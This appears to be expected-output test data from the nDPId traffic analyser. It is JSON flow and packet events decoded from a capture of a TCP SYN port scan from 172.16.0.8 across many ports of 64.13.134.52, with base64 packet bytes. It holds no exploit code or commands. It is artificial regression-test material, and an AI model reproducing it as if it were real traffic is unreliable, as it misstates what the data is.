-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":991,"source":"synscan.pcap","alias":"nDPId-test","flow_id":982,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAslZYAADIGgNysEAAIQA2GNIzTFi\/dU4MZAAAAAGACDAAWXQAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":992,"source":"synscan.pcap","alias":"nDPId-test","flow_id":983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":992,"source":"synscan.pcap","alias":"nDPId-test","flow_id":983,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsq3UAADsGYf2sEAAIQA2GNIzTA9vdU4MZAAAAAGACEAAksQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":993,"source":"synscan.pcap","alias":"nDPId-test","flow_id":984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":993,"source":"synscan.pcap","alias":"nDPId-test","flow_id":984,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAs8X8AAC4GKPOsEAAIQA2GNIzTHmLdU4MZAAAAAGACDAAOKgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":994,"source":"synscan.pcap","alias":"nDPId-test","flow_id":985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":994,"source":"synscan.pcap","alias":"nDPId-test","flow_id":985,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsmB0AADMGfVWsEAAIQA2GNIzSeT7dUoMYAAAAAGACEACvUAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":995,"source":"synscan.pcap","alias":"nDPId-test","flow_id":986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":995,"source":"synscan.pcap","alias":"nDPId-test","flow_id":986,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsU8cAACkGy6usEAAIQA2GNIzSLuDdUoMYAAAAAGACCAABrwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":996,"source":"synscan.pcap","alias":"nDPId-test","flow_id":987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":996,"source":"synscan.pcap","alias":"nDPId-test","flow_id":987,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsXS0AACwGv0WsEAAIQA2GNIzSKXjdUoMYAAAAAGACBAALFwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"synscan.pcap","alias":"nDPId-test","flow_id":988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"synscan.pcap","alias":"nDPId-test","flow_id":988,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsxRsAADcGTFesEAAIQA2GNIzSBCPdUoMYAAAAAGACEAAkbAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":998,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsOP4AADQG23SsEAAIQA2GNIzSCizdUoMYAAAAAGACBAAqYwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":999,"source":"synscan.pcap","alias":"nDPId-test","flow_id":990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"synscan.pcap","alias":"nDPId-test","flow_id":990,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsP6EAACcG4dGsEAAIQA2GNIzSxUTdUoMYAAAAAGACEABjSgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1000,"source":"synscan.pcap","alias":"nDPId-test","flow_id":991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"synscan.pcap","alias":"nDPId-test","flow_id":991,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAslXMAACkGif+sEAAIQA2GNIzSEVvdUoMYAAAAAGACCAAfNAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"synscan.pcap","alias":"nDPId-test","flow_id":992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"synscan.pcap","alias":"nDPId-test","flow_id":992,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsfHcAACsGoPusEAAIQA2GNIzSB2zdUoMYAAAAAGACEAAhIwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1002,"source":"synscan.pcap","alias":"nDPId-test","flow_id":993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1002,"source":"synscan.pcap","alias":"nDPId-test","flow_id":993,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsIMoAADgG76isEAAIQA2GNIzSBHHdUoMYAAAAAGACBAAwHgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1003,"source":"synscan.pcap","alias":"nDPId-test","flow_id":994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1003,"source":"synscan.pcap","alias":"nDPId-test","flow_id":994,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsI7sAADYG7resEAAIQA2GNIzSI3ndUoMYAAAAAGACDAAJFgAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1004,"source":"synscan.pcap","alias":"nDPId-test","flow_id":995,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5802,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"synscan.pcap","alias":"nDPId-test","flow_id":995,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAseE4AACgGqCSsEAAIQA2GNIzSFqrdUoMYAAAAAGACBAAd5QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1005,"source":"synscan.pcap","alias":"nDPId-test","flow_id":996,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1005,"source":"synscan.pcap","alias":"nDPId-test","flow_id":996,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsC6AAAC8GDdOsEAAIQA2GNIzSTVndUoMYAAAAAGACEADbNQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1006,"source":"synscan.pcap","alias":"nDPId-test","flow_id":997,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1006,"source":"synscan.pcap","alias":"nDPId-test","flow_id":997,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAs4+4AADAGNISsEAAIQA2GNIzSBaPdUoMYAAAAAGACBAAu7AAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1007,"source":"synscan.pcap","alias":"nDPId-test","flow_id":998,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1007,"source":"synscan.pcap","alias":"nDPId-test","flow_id":998,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsYDsAACwGvDesEAAIQA2GNIzSgA\/dUoMYAAAAAGACBAC0fwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1008,"source":"synscan.pcap","alias":"nDPId-test","flow_id":999,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1008,"source":"synscan.pcap","alias":"nDPId-test","flow_id":999,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsO94AADgG1JSsEAAIQA2GNIzTGiHdU4MZAAAAAGACBAAaawAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1009,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1000,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1009,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1000,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsafYAAC8Gr3ysEAAIQA2GNIzTD4PdU4MZAAAAAGACEAAZCQAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1010,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1001,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49158,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1010,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1001,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/NEAAC8GHKGsEAAIQA2GNIzTwAbdU4MZAAAAAGACEABohQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1002,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1002,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAs0YEAACUGUfGsEAAIQA2GNIzTRrXdU4MZAAAAAGACCADp1gAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1012,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1003,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64680,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1012,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1003,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsJvQAACcG+n6sEAAIQA2GNIzT\/KjdU4MZAAAAAGACEAAr4wAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1013,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1004,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1004,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsu4wAADEGW+asEAAIQA2GNIzTB9ndU4MZAAAAAGACCAAoswAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1014,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1005,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":705,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1014,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1005,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsomcAADMGcwusEAAIQA2GNIzTAsHdU4MZAAAAAGACEAAlywAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1015,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1006,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1006,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsV\/gAADMGvXqsEAAIQA2GNIzTBKLdU4MZAAAAAGACEAAj6gAAAgQFtA=="} 
